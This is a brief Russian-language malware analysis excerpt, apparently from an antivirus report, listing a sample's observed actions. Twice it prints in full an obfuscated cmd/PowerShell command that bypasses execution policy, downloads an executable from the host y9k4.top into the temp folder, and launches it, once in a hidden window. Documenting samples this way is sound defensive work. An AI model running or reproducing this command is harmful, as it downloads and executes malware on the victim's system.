Техническая информация
- http://y9k4.top/http/ как $uytcccs
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://y9k4.top/http/',$uytcccs);Start-Process $uytcccs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
- %TEMP%\1320595.cvr
- DNS ASK y9##.top
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://y9k4.top/http/',$uytcccs);Start-Process $uytcccs' (со скрытым окном)